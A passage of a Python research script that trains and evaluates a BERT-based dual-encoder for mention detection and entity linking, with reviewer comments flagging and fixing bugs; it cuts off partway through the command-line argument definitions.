    for sow in (random.seed, np.random.seed, torch.manual_seed):
        sow(seed_value)
    if args.n_gpu > 0:
        torch.cuda.manual_seed_all(seed_value)
def train(args, model, tokenizer):
    """Train the dual-encoder model.

    The training protocol is selected by mutually exclusive flags on ``args``:
      * ``args.ner``             -- mention-tagging (NER) loss only.
      * ``args.alternate_batch`` -- per batch, randomly do tagging OR linking.
      * ``args.ner_and_ned``     -- joint tagging + linking loss (default).

    Args:
        args: parsed command-line namespace (device, batch sizes, protocol
            flags, checkpointing options, ...).
        model: the dual-encoder model to optimize.
        tokenizer: tokenizer used to (re)build datasets between epochs.

    Returns:
        (global_step, average training loss per optimization step).
    """
    if args.local_rank in [-1, 0]:
        tb_writer = SummaryWriter()

    # Initial train dataloader
    if args.use_random_candidates:
        train_dataset, _, _ = load_and_cache_examples(args, tokenizer)
    elif args.use_hard_negatives or args.use_hard_and_random_negatives:
        # Hard-negative mining needs the current model to score candidates.
        train_dataset, _, _ = load_and_cache_examples(args, tokenizer, model)
    else:
        train_dataset, _, _ = load_and_cache_examples(args, tokenizer)

    args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
    train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
    train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)

    if args.max_steps > 0:
        t_total = args.max_steps
        args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
    else:
        t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs

    # Prepare optimizer and schedule (linear warmup and decay); bias and
    # LayerNorm parameters are exempt from weight decay, as is conventional.
    no_decay = ["bias", "LayerNorm.weight"]
    optimizer_grouped_parameters = [
        {
            "params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
            "weight_decay": args.weight_decay,
        },
        {"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
    ]
    optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
    scheduler = get_linear_schedule_with_warmup(
        optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
    )

    # Check if saved optimizer or scheduler states exist
    if args.resume_path is not None and os.path.isfile(os.path.join(args.resume_path, "optimizer.pt")) \
            and os.path.isfile(os.path.join(args.resume_path, "scheduler.pt")):
        # Load in optimizer and scheduler states
        optimizer.load_state_dict(torch.load(os.path.join(args.resume_path, "optimizer.pt")))
        scheduler.load_state_dict(torch.load(os.path.join(args.resume_path, "scheduler.pt")))
        logger.info("INFO: Optimizer and scheduler state loaded successfully.")

    if args.fp16:
        try:
            from apex import amp
        except ImportError:
            raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
        model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)

    # multi-gpu training (should be after apex fp16 initialization)
    if args.n_gpu > 1:
        model = torch.nn.DataParallel(model)

    # Distributed training (should be after apex fp16 initialization)
    if args.local_rank != -1:
        model = torch.nn.parallel.DistributedDataParallel(
            model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True
        )

    # Train!
    logger.info("***** Running training *****")
    logger.info(" Num examples = %d", len(train_dataset))
    logger.info(" Num Epochs = %d", args.num_train_epochs)
    logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
    logger.info(
        " Total train batch size (w. parallel, distributed & accumulation) = %d",
        args.train_batch_size
        * args.gradient_accumulation_steps
        * (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
    )
    logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
    logger.info(" Total optimization steps = %d", t_total)

    global_step = 0
    epochs_trained = 0
    steps_trained_in_current_epoch = 0
    # Check if continuing training from a checkpoint
    if args.resume_path is not None:
        # set global_step to global_step of last saved checkpoint from model path
        global_step = int(args.resume_path.split("/")[-2].split("-")[-1])
        epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
        steps_trained_in_current_epoch = global_step % (len(train_dataloader) // args.gradient_accumulation_steps)
        logger.info(" Continuing training from checkpoint, will skip to saved global_step")
        logger.info(" Continuing training from epoch %d", epochs_trained)
        logger.info(" Continuing training from global step %d", global_step)
        logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch)

    tr_loss, logging_loss = 0.0, 0.0
    model.zero_grad()
    train_iterator = trange(
        epochs_trained, int(args.num_train_epochs), desc="Epoch", disable=args.local_rank not in [-1, 0]
    )
    set_seed(args)  # Added here for reproductibility
    for epoch_num in train_iterator:
        epoch_iterator = tqdm(train_dataloader, desc="Iteration", disable=args.local_rank not in [-1, 0])
        for step, batch in enumerate(epoch_iterator):
            # Skip past any already trained steps if resuming training
            if steps_trained_in_current_epoch > 0:
                steps_trained_in_current_epoch -= 1
                continue
            model.train()
            batch = tuple(t.to(args.device) for t in batch)
            ner_inputs = {"args": args,
                          "mention_token_ids": batch[0],
                          "mention_token_masks": batch[1],
                          "mention_start_indices": batch[7],
                          "mention_end_indices": batch[8],
                          "mode": 'ner',
                          }
            if args.use_hard_and_random_negatives:
                ned_inputs = {"args": args,
                              "last_hidden_states": None,
                              "mention_start_indices": batch[7],
                              "mention_end_indices": batch[8],
                              "candidate_token_ids_1": batch[2],
                              "candidate_token_masks_1": batch[3],
                              "candidate_token_ids_2": batch[4],
                              "candidate_token_masks_2": batch[5],
                              "labels": batch[6],
                              "mode": 'ned',
                              }
            else:
                ned_inputs = {"args": args,
                              "mention_token_ids": batch[0],
                              "mention_token_masks": batch[1],
                              "mention_start_indices": batch[7],
                              "mention_end_indices": batch[8],
                              "candidate_token_ids_1": batch[2],
                              "candidate_token_masks_1": batch[3],
                              "labels": batch[6],
                              "mode": 'ned',
                              }
            if args.ner:
                loss, _ = model.forward(**ner_inputs)
            elif args.alternate_batch:
                # Randomly choose whether to do tagging or NED for the current batch
                if random.random() <= 0.5:
                    # BUGFIX: the 'ner' forward returns (loss, hidden_states);
                    # the original assigned the whole tuple to `loss`, which
                    # would break loss.mean()/loss.backward() below.
                    loss, _ = model.forward(**ner_inputs)
                else:
                    loss, _ = model.forward(**ned_inputs)
            elif args.ner_and_ned:
                ner_loss, last_hidden_states = model.forward(**ner_inputs)
                # Reuse the document encoding from the NER pass for linking.
                ned_inputs["last_hidden_states"] = last_hidden_states
                ned_loss, _ = model.forward(**ned_inputs)
                loss = ner_loss + ned_loss
            else:
                # BUGFIX: fail fast. The original only logged here and then
                # crashed on an undefined `loss` a few lines below.
                raise ValueError(" Specify a training protocol from (ner, alternate_batch, ner_and_ned)")

            if args.n_gpu > 1:
                loss = loss.mean()  # mean() to average on multi-gpu parallel training
            if args.gradient_accumulation_steps > 1:
                loss = loss / args.gradient_accumulation_steps

            if args.fp16:
                with amp.scale_loss(loss, optimizer) as scaled_loss:
                    scaled_loss.backward()
            else:
                loss.backward()

            tr_loss += loss.item()
            if (step + 1) % args.gradient_accumulation_steps == 0:
                if args.fp16:
                    torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)
                else:
                    torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
                optimizer.step()
                scheduler.step()  # Update learning rate schedule
                model.zero_grad()
                global_step += 1

                if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
                    # Log metrics
                    if (
                        args.local_rank == -1 and args.evaluate_during_training
                    ):  # Only evaluate when single GPU otherwise metrics may not average well
                        results = evaluate(args, model, tokenizer)
                        for key, value in results.items():
                            tb_writer.add_scalar("eval_{}".format(key), value, global_step)
                    tb_writer.add_scalar("lr", scheduler.get_lr()[0], global_step)
                    tb_writer.add_scalar("loss", (tr_loss - logging_loss) / args.logging_steps, global_step)
                    logging_loss = tr_loss

                if args.local_rank in [-1, 0] and args.save_steps > 0 and global_step % args.save_steps == 0:
                    # Save model checkpoint
                    output_dir = os.path.join(args.output_dir, "checkpoint-{}".format(global_step))
                    if not os.path.exists(output_dir):
                        os.makedirs(output_dir)
                    model_to_save = (
                        model.module if hasattr(model, "module") else model
                    )  # Take care of distributed/parallel training
                    model_to_save.save_pretrained(output_dir)
                    tokenizer.save_pretrained(output_dir)
                    torch.save(args, os.path.join(output_dir, "training_args.bin"))
                    logger.info("Saving model checkpoint to %s", output_dir)
                    torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
                    torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
                    logger.info("Saving optimizer and scheduler states to %s", output_dir)

            if args.max_steps > 0 and global_step > args.max_steps:
                epoch_iterator.close()
                break
        if args.max_steps > 0 and global_step > args.max_steps:
            train_iterator.close()
            break

        # New data loader for the next epoch so each epoch sees fresh negatives.
        if args.use_random_candidates:
            # New data loader at every epoch for random sampler if we use random negative samples
            train_dataset, _, _ = load_and_cache_examples(args, tokenizer)
            args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
            train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(
                train_dataset)
            train_dataloader = DataLoader(train_dataset, sampler=train_sampler,
                                          batch_size=args.train_batch_size)
        elif args.use_hard_negatives or args.use_hard_and_random_negatives:
            # New data loader at every epoch for hard negative sampler if we use hard negative mining
            train_dataset, _, _ = load_and_cache_examples(args, tokenizer, model)
            args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
            train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(
                train_dataset)
            train_dataloader = DataLoader(train_dataset, sampler=train_sampler,
                                          batch_size=args.train_batch_size)

        # Anneal the lambda_1 and lambda_2 weights.
        # NOTE(review): the per-epoch increment shrinks as 1/(epoch_num+1) and
        # lambda_1 goes negative after the first epoch when it starts at 1 —
        # confirm this schedule is intentional.
        args.lambda_1 = args.lambda_1 - 1 / (epoch_num + 1)
        args.lambda_2 = args.lambda_2 + 1 / (epoch_num + 1)

    if args.local_rank in [-1, 0]:
        tb_writer.close()

    return global_step, tr_loss / global_step
def evaluate(args, model, tokenizer, prefix=""):
    """Run mention detection + entity linking inference on the eval set.

    Writes gold mention/entity rows to ``gold.csv`` and predicted rows to
    ``pred.csv`` (tab-separated), then returns ``results`` (currently an
    empty dict; the metric computation below is commented out).
    """
    eval_output_dir = args.output_dir

    eval_dataset, (all_entities, all_entity_token_ids, all_entity_token_masks), \
        (all_document_ids, all_label_candidate_ids) = load_and_cache_examples(args, tokenizer)

    if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:
        os.makedirs(eval_output_dir)

    args.eval_batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
    # Note that DistributedSampler samples randomly
    eval_sampler = SequentialSampler(eval_dataset)
    eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)

    # multi-gpu eval
    if args.n_gpu > 1:
        model = torch.nn.DataParallel(model)

    if args.use_all_candidates:
        # Pre-compute one embedding per KB entity so every detected mention
        # can be scored against the full candidate set.
        all_candidate_embeddings = []
        with torch.no_grad():
            for i, _ in enumerate(all_entity_token_ids):
                entity_tokens = all_entity_token_ids[i]
                entity_tokens_masks = all_entity_token_masks[i]
                candidate_token_ids = torch.LongTensor([entity_tokens]).to(args.device)
                candidate_token_masks = torch.LongTensor([entity_tokens_masks]).to(args.device)
                if args.n_gpu > 1:
                    candidate_outputs = model.module.bert_candidate.bert(
                        input_ids=candidate_token_ids,
                        attention_mask=candidate_token_masks,
                    )
                else:
                    candidate_outputs = model.bert_candidate.bert(
                        input_ids=candidate_token_ids,
                        attention_mask=candidate_token_masks,
                    )
                # candidate_outputs[1] is the pooled output for the candidate.
                candidate_embedding = candidate_outputs[1]
                all_candidate_embeddings.append(candidate_embedding)

        all_candidate_embeddings = torch.cat(all_candidate_embeddings, dim=0)
        logger.info("INFO: Collected all candidate embeddings.")
        print("Tensor size = ", all_candidate_embeddings.size())
        all_candidate_embeddings = all_candidate_embeddings.unsqueeze(0).expand(args.eval_batch_size, -1, -1)

    # Eval!
    logger.info("***** Running evaluation {} *****".format(prefix))
    logger.info(" Num examples = %d", len(eval_dataset))
    logger.info(" Batch size = %d", args.eval_batch_size)
    eval_loss = 0.0
    nb_eval_steps = 0
    results = {}
    p_1 = 0
    map = 0  # NOTE: shadows the builtin; kept because the commented metric code below uses it
    r_10 = 0
    nb_samples = 0
    nb_normalized = 0
    tp = 0
    fp = 0
    fn = 0

    def get_mention_spans(mention_token_ids, predicted_tags, doc_lens):
        # Decode per-token tag sequences (0=O, 1=B, 2=I) into lists of
        # start/end token indices, one pair of lists per batch element.
        # WordPiece continuation tokens ('##...') are absorbed into the span.
        b_size = predicted_tags.size(0)
        b_start_indices = []
        b_end_indices = []
        for b_idx in range(b_size):
            tags = predicted_tags[b_idx].cpu().numpy()
            start_indices = []
            end_indices = []
            start_index = 0
            end_index = 0
            mention_found = False
            for j in range(1, doc_lens[b_idx] - 1):  # Excluding [CLS], [SEP]
                if tags[j] == 1:  # If the token tag is 1, this is the beginning of a mention B
                    start_index = j
                    end_index = j
                    for k in range(j+1, doc_lens[b_idx] - 1):
                        if tokenizer.convert_ids_to_tokens([mention_token_ids[b_idx][k]])[0].startswith('##'):
                            # NOTE(review): `j += 1` does not advance the outer
                            # range() loop variable; only end_index grows here.
                            j += 1
                            end_index += 1
                        else:
                            break
                    mention_found = True
                elif tags[j] == 2:
                    if tags[j-1] == 0:  # If the previous token is 0, it's the start of a mention (imperfect though)
                        start_index = j
                        end_index = j
                    else:
                        end_index += 1
                    for k in range(j+1, doc_lens[b_idx] - 1):
                        if tokenizer.convert_ids_to_tokens([mention_token_ids[b_idx][k]])[0].startswith('##'):
                            j += 1
                            end_index += 1
                        else:
                            break
                    mention_found = True
                elif tags[j] == 0 and mention_found:  # End of mention
                    start_indices.append(start_index)
                    end_indices.append(end_index)
                    mention_found = False
            # If the last token(s) are a mention
            if mention_found:
                start_indices.append(start_index)
                end_indices.append(end_index)
            b_start_indices.append(start_indices)
            b_end_indices.append(end_indices)
        return b_start_indices, b_end_indices

    def find_partially_overlapping_spans(pred_mention_start_indices, pred_mention_end_indices,
                                         gold_mention_start_indices, gold_mention_end_indices, doc_lens):
        # Match predicted spans against gold spans, counting gold mentions
        # with no overlapping prediction and predictions overlapping no gold
        # span; returns the clipped overlap regions and which gold span each
        # overlap belongs to.
        b_size = gold_mention_start_indices.shape[0]
        num_mentions = gold_mention_start_indices.shape[1]
        # Get the Gold mention spans as tuples
        gold_mention_spans = [[(gold_mention_start_indices[b_idx][j], gold_mention_end_indices[b_idx][j])
                               for j in range(num_mentions)]
                              for b_idx in range(b_size)]
        # Get the predicted mention spans as tuples
        predicted_mention_spans = [[] for b_idx in range(b_size)]
        for b_idx in range(b_size):
            num_pred_mentions = len(pred_mention_start_indices[b_idx])
            for j in range(num_pred_mentions):
                predicted_mention_spans[b_idx].append((pred_mention_start_indices[b_idx][j], pred_mention_end_indices[b_idx][j]))

        unmatched_gold_mentions = 0
        extraneous_predicted_mentions = 0
        b_overlapping_start_indices = []
        b_overlapping_end_indices = []
        b_which_gold_spans = []
        for b_idx in range(b_size):
            overlapping_start_indices = []
            overlapping_end_indices = []
            which_gold_spans = []
            p_mention_spans = predicted_mention_spans[b_idx]
            g_mention_spans = gold_mention_spans[b_idx]
            for span_num, (g_s, g_e) in enumerate(g_mention_spans):
                found_overlapping_pred = False
                for (p_s, p_e) in p_mention_spans:
                    if p_s >= doc_lens[b_idx]:  # If the predicted start index is beyond valid tokens
                        break
                    elif g_s <= p_s <= g_e:  # The beginning of prediction is within the gold span
                        overlapping_start_indices.append(p_s)
                        if g_e <= p_e:
                            overlapping_end_indices.append(g_e)
                        else:
                            overlapping_end_indices.append(p_e)
                        which_gold_spans.append(span_num)
                        found_overlapping_pred = True
                    elif g_s <= p_e <= g_e:  # The end of the predicted span is within the gold span
                        if g_s >= p_s:
                            overlapping_start_indices.append(g_s)
                        else:
                            overlapping_start_indices.append(p_s)
                        overlapping_end_indices.append(p_e)
                        which_gold_spans.append(span_num)
                        found_overlapping_pred = True
                if not found_overlapping_pred:
                    unmatched_gold_mentions += 1
            for (p_s, p_e) in p_mention_spans:
                if p_s >= doc_lens[b_idx]:  # If the start index is beyond valid tokens
                    break
                found_overlapping_pred = False
                for (g_s, g_e) in g_mention_spans:
                    if g_s <= p_s <= g_e:  # The beginning of prediction is withing the gold span
                        found_overlapping_pred = True
                    elif g_s <= p_e <= g_e:  # The end of the predicted span is within the gold span
                        found_overlapping_pred = True
                if not found_overlapping_pred:
                    extraneous_predicted_mentions += 1
            b_overlapping_start_indices.append(overlapping_start_indices)
            b_overlapping_end_indices.append(overlapping_end_indices)
            b_which_gold_spans.append(which_gold_spans)

        return unmatched_gold_mentions, extraneous_predicted_mentions, \
            b_overlapping_start_indices, b_overlapping_end_indices, b_which_gold_spans

    # Files to write
    gold_file = open('gold.csv', 'w+')
    pred_file = open('pred.csv', 'w+')

    num_mention_processed = 0
    for batch in tqdm(eval_dataloader, desc="Evaluating"):
        model.eval()
        batch = tuple(t.to(args.device) for t in batch)
        with torch.no_grad():
            doc_input = {"args": args,
                         "mention_token_ids": batch[0],
                         "mention_token_masks": batch[1],
                         "mode": 'ner',
                         }
            pred_mention_start_indices, pred_mention_end_indices, pred_mention_span_scores, last_hidden_states = model.forward(**doc_input)
            pred_mention_span_probs = torch.sigmoid(pred_mention_span_scores)
            spans_after_prunning = torch.where(pred_mention_span_probs >= args.gamma)
            if spans_after_prunning[0].size(0) <= 0:
                # Fall back to the 8 highest-scoring spans when nothing
                # clears the gamma threshold.
                _, spans_after_prunning = torch.topk(pred_mention_span_probs, 8)

            mention_start_indices = pred_mention_start_indices[spans_after_prunning]
            mention_end_indices = pred_mention_end_indices[spans_after_prunning]

            if args.use_all_candidates:
                mention_inputs = {"args": args,
                                  "last_hidden_states": last_hidden_states,
                                  "mention_start_indices": mention_start_indices.unsqueeze(0),
                                  "mention_end_indices": mention_end_indices.unsqueeze(0),
                                  "all_candidate_embeddings": all_candidate_embeddings,
                                  "mode": 'ned',
                                  }
            else:
                mention_inputs = {"args": args,
                                  "last_hidden_states": last_hidden_states,
                                  "mention_start_indices": mention_start_indices,
                                  # BUGFIX: the original passed
                                  # mention_start_indices here as well.
                                  "mention_end_indices": mention_end_indices,
                                  "candidate_token_ids_1": batch[2],
                                  "candidate_token_masks_1": batch[3],
                                  "mode": 'ned',
                                  }

            _, logits = model(**mention_inputs)
            preds = logits.detach().cpu().numpy()
            # Rank candidates per mention by descending score.
            sorted_preds = np.flip(np.argsort(preds), axis=1)
            predicted_entities = []
            for i, sorted_pred in enumerate(sorted_preds):
                predicted_entity_idx = sorted_preds[i][0]
                predicted_entity = all_entities[predicted_entity_idx]
                predicted_entities.append(predicted_entity)

        # Write the gold entities
        num_mentions = batch[9].detach().cpu().numpy()[0]
        document_ids = all_document_ids[num_mention_processed:num_mention_processed + num_mentions]
        assert all(doc_id == document_ids[0] for doc_id in document_ids)
        gold_mention_start_indices = batch[7].detach().cpu().numpy()[0][:num_mentions]
        gold_mention_end_indices = batch[8].detach().cpu().numpy()[0][:num_mentions]
        gold_entities = all_label_candidate_ids[num_mention_processed:num_mention_processed + num_mentions]
        for j in range(num_mentions):
            if gold_mention_start_indices[j] > gold_mention_end_indices[j]:
                continue
            gold_write = document_ids[j] + '\t' + str(gold_mention_start_indices[j]) \
                         + '\t' + str(gold_mention_end_indices[j]) \
                         + '\t' + str(gold_entities[j]) \
                         + '\t' + str(1.0) \
                         + '\t' + 'NA' + '\n'
            gold_file.write(gold_write)

        # Write the predicted entities
        doc_id_processed = document_ids[0]
        num_pred_mentions = len(predicted_entities)
        mention_start_indices = mention_start_indices.detach().cpu().numpy()
        mention_end_indices = mention_end_indices.detach().cpu().numpy()
        mention_probs = pred_mention_span_probs[spans_after_prunning].detach().cpu().numpy()
        for j in range(num_pred_mentions):
            # NOTE(review): this guard indexes the pre-pruning tensors while
            # the written rows use the pruned mention_* arrays — confirm the
            # intended check is mention_start_indices[j] > mention_end_indices[j].
            if pred_mention_start_indices[j] > pred_mention_end_indices[j]:
                continue
            pred_write = doc_id_processed + '\t' + str(mention_start_indices[j]) \
                         + '\t' + str(mention_end_indices[j]) \
                         + '\t' + str(predicted_entities[j]) \
                         + '\t' + str(mention_probs[j]) \
                         + '\t' + 'NA' + '\n'
            pred_file.write(pred_write)

        num_mention_processed += num_mentions

    # for b_idx in range(sorted_preds.size(0)):
    #     for i, sorted_pred in enumerate(sorted_preds):
    #         if out_label_ids[i] != -1:
    #             if out_label_ids[i] != -100:
    #                 rank = np.where(sorted_pred == out_label_ids[i])[0][0] + 1
    #                 map += 1 / rank
    #                 if rank <= 10:
    #                     r_10 += 1
    #                     if rank == 1:
    #                         p_1 += 1
    #                         tp += 1  # This entity resolution is sucessful
    #                     else:
    #                         fn += 1  # Unsuccessful entity resolution
    #             else:
    #                 fn += 1  # Unsuccessful entity resolution
    #             nb_normalized += 1
    #         nb_samples += 1
    #     nb_eval_steps += 1
    #
    # # Unnormalized precision
    # p_1_unnormalized = p_1 / nb_samples
    # map_unnormalized = map / nb_samples
    #
    # # Normalized precision
    # p_1_normalized = p_1 / nb_normalized
    # map_normalized = map / nb_normalized
    #
    # # Recall@10
    # recall_10 = r_10 / nb_samples
    #
    # # Precision, recall, F-1
    # macro_precision = tp / (tp + fp)
    # macro_recall = tp / (tp + fn)
    # macro_f1 = (2 * macro_precision * macro_recall) / (macro_precision + macro_recall)
    #
    # results["P@1"] = p_1_unnormalized
    # results["MAP"] = map_unnormalized

    # BUGFIX: the output files were never closed (leaked handles; buffered
    # rows could be lost on interpreter teardown).
    gold_file.close()
    pred_file.close()

    return results
def load_and_cache_examples(args, tokenizer, model=None):
    """Build (or load from cache) the TensorDataset plus entity/document tables.

    Args:
        args: command-line namespace (data_dir, do_train, overwrite_cache, ...).
        tokenizer: tokenizer used when features must be (re)built.
        model: optional model, used by hard-negative candidate mining.

    Returns:
        (dataset,
         (all_entities, all_entity_token_ids, all_entity_token_masks),
         (all_document_ids, all_label_candidate_ids))
    """
    # BUGFIX: the original condition was `... and not evaluate`, but `evaluate`
    # here resolved to the module-level evaluation *function* (always truthy),
    # so `not evaluate` was always False and the barrier never ran. The
    # intended flag is "training mode", derived from args.do_train (consistent
    # with `mode` below).
    if args.local_rank not in [-1, 0] and args.do_train:
        torch.distributed.barrier()  # Make sure only the first process in distributed training process the dataset, and the others will use the cache

    mode = 'train' if args.do_train else 'test'
    # Load data features from cache or dataset file
    cached_features_file = os.path.join(
        args.data_dir,
        "cached_{}_{}".format(
            mode,
            list(filter(None, args.model_name_or_path.split("/"))).pop()),
    )
    if os.path.exists(cached_features_file) and not args.overwrite_cache:
        logger.info("Loading features from cached file %s", cached_features_file)
        features = torch.load(cached_features_file)
        all_entities = np.load(os.path.join(args.data_dir, 'all_entities.npy'))
        all_entity_token_ids = np.load(os.path.join(args.data_dir, 'all_entity_token_ids.npy'))
        all_entity_token_masks = np.load(os.path.join(args.data_dir, 'all_entity_token_masks.npy'))
        all_document_ids = np.load(os.path.join(args.data_dir, 'all_document_ids.npy'))
        all_label_candidate_ids = np.load(os.path.join(args.data_dir, 'all_label_candidate_ids.npy'))
    else:
        logger.info("Creating features from dataset file at %s", args.data_dir)
        examples, docs, entities = get_examples(args.data_dir, mode)
        features, (all_entities, all_entity_token_ids, all_entity_token_masks), (all_document_ids, all_label_candidate_ids) = convert_examples_to_features(
            examples,
            docs,
            entities,
            args.max_seq_length,
            tokenizer,
            args,
            model,
        )
        if args.local_rank in [-1, 0]:
            logger.info("Saving features into cached file %s", cached_features_file)
            torch.save(features, cached_features_file)
            np.save(os.path.join(args.data_dir, 'all_entities.npy'),
                    np.array(all_entities))
            np.save(os.path.join(args.data_dir, 'all_entity_token_ids.npy'),
                    np.array(all_entity_token_ids))
            np.save(os.path.join(args.data_dir, 'all_entity_token_masks.npy'),
                    np.array(all_entity_token_masks))
            np.save(os.path.join(args.data_dir, 'all_document_ids.npy'),
                    np.array(all_document_ids))
            np.save(os.path.join(args.data_dir, 'all_label_candidate_ids.npy'),
                    np.array(all_label_candidate_ids))

    # BUGFIX: same `not evaluate` problem as above (see comment there).
    if args.local_rank == 0 and args.do_train:
        torch.distributed.barrier()  # Make sure only the first process in distributed training process the dataset, and the others will use the cache

    # Convert to Tensors and build dataset. Candidate tensors fall back to [0]
    # when a feature carries no candidates so torch.tensor gets a ragged-free list.
    all_mention_token_ids = torch.tensor([f.mention_token_ids for f in features], dtype=torch.long)
    all_mention_token_masks = torch.tensor([f.mention_token_masks for f in features], dtype=torch.long)
    all_candidate_token_ids_1 = torch.tensor([f.candidate_token_ids_1 if f.candidate_token_ids_1 is not None else [0] for f in features], dtype=torch.long)
    all_candidate_token_masks_1 = torch.tensor([f.candidate_token_masks_1 if f.candidate_token_masks_1 is not None else [0] for f in features], dtype=torch.long)
    all_candidate_token_ids_2 = torch.tensor([f.candidate_token_ids_2 if f.candidate_token_ids_2 is not None else [0] for f in features], dtype=torch.long)
    all_candidate_token_masks_2 = torch.tensor([f.candidate_token_masks_2 if f.candidate_token_masks_2 is not None else [0] for f in features], dtype=torch.long)
    all_labels = torch.tensor([f.label_ids for f in features], dtype=torch.long)
    all_mention_start_indices = torch.tensor([f.mention_start_indices for f in features], dtype=torch.long)
    all_mention_end_indices = torch.tensor([f.mention_end_indices for f in features], dtype=torch.long)
    all_num_mentions = torch.tensor([f.num_mentions for f in features], dtype=torch.long)
    all_seq_tag_ids = torch.tensor([f.seq_tag_ids for f in features], dtype=torch.long)

    dataset = TensorDataset(all_mention_token_ids,
                            all_mention_token_masks,
                            all_candidate_token_ids_1,
                            all_candidate_token_masks_1,
                            all_candidate_token_ids_2,
                            all_candidate_token_masks_2,
                            all_labels,
                            all_mention_start_indices,
                            all_mention_end_indices,
                            all_num_mentions,
                            all_seq_tag_ids,
                            )
    return dataset, (all_entities, all_entity_token_ids, all_entity_token_masks), (all_document_ids, all_label_candidate_ids)
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--data_dir",
default=None,
type=str,
required=True,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.",
)
parser.add_argument(
"--model_type",
default=None,
type=str,
required=True,
help="Model type selected in the list: " + ", ".join(MODEL_CLASSES.keys()),
)
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
help="Path to pre-trained model or shortcut name selected in the list: " + ", ".join(ALL_MODELS),
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.",
)
parser.add_argument(
"--resume_path",
default=None,
type=str,
required=False,
help="Path to the checkpoint from where the training should resume"
)
# Other parameters
parser.add_argument(
"--config_name", default="", type=str, help="Pretrained config name or path if not the same as model_name"
)
parser.add_argument(
"--tokenizer_name",
default="",
type=str,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--cache_dir",
default="",
type=str,
help="Where do you want to store the pre-trained models downloaded from s3",
)
parser.add_argument(
"--max_seq_length",
default=512,
type=int,
help="The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded.",
)
parser.add_argument(
"--max_mention_length",
default=20,
type=int,
help="Maximum length of a mention span"
)
parser.add_argument("--do_train", action="store_true", help="Whether to run training.")
parser.add_argument("--do_eval", action="store_true", help="Whether to run eval on the test set.")
parser.add_argument(
"--evaluate_during_training", action="store_true", help="Rul evaluation during training at each logging step."
)
parser.add_argument(
"--do_lower_case", action="store_true", default=False, help="Set this flag if you are using an uncased model."
)
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int, help="Batch size per GPU/CPU for training.")
parser.add_argument(
"--per_gpu_eval_batch_size", default=1, type=int, help="Batch size per GPU/CPU for evaluation."
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument("--learning_rate", default=1e-5, type=float, help="The initial learning rate for Adam.")
parser.add_argument("--weight_decay", default=0.0, type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8, type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.")
parser.add_argument(
"--num_train_epochs", default=3.0, type=float, help="Total number of training epochs to perform."
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
)
parser.add_argument("--warmup_steps", default=0, type=int, help="Linear warmup over warmup_steps.")
parser.add_argument("--logging_steps", type=int, default=100, help="Log every X updates steps.")
parser.add_argument("--save_steps", type=int, default=5000, help="Save checkpoint every X updates steps.")
parser.add_argument(
"--eval_all_checkpoints",
action="store_true",
help="Evaluate all checkpoints starting with the same prefix as model_name ending and ending with step number",
)
parser.add_argument("--no_cuda", action="store_true", help="Avoid using CUDA when available")
parser.add_argument("--n_gpu", type=int, default=1, help="Number of GPUs to use when available")
parser.add_argument(
"--overwrite_output_dir", action="store_true", help="Overwrite the content of the output directory"
)
parser.add_argument(
"--overwrite_cache", action="store_true", help="Overwrite the cached training and evaluation sets"
)
parser.add_argument(
"--use_random_candidates", action="store_true", help="Use random negative candidates during training"
)
parser.add_argument(
"--use_tfidf_candidates", action="store_true", help="Use random negative candidates during training"
)
parser.add_argument(
"--use_hard_negatives", action="store_true", help="Use hard negative candidates during training"
)
parser.add_argument(
"--use_hard_and_random_negatives", action="store_true", help="Use hard negative candidates during training"
)
parser.add_argument(
"--include_positive", action="store_true", help="Includes the positive candidate during inference"
)
parser.add_argument(
"--use_all_candidates", action="store_true", help="Use all entities as candidates"
)
parser.add_argument(
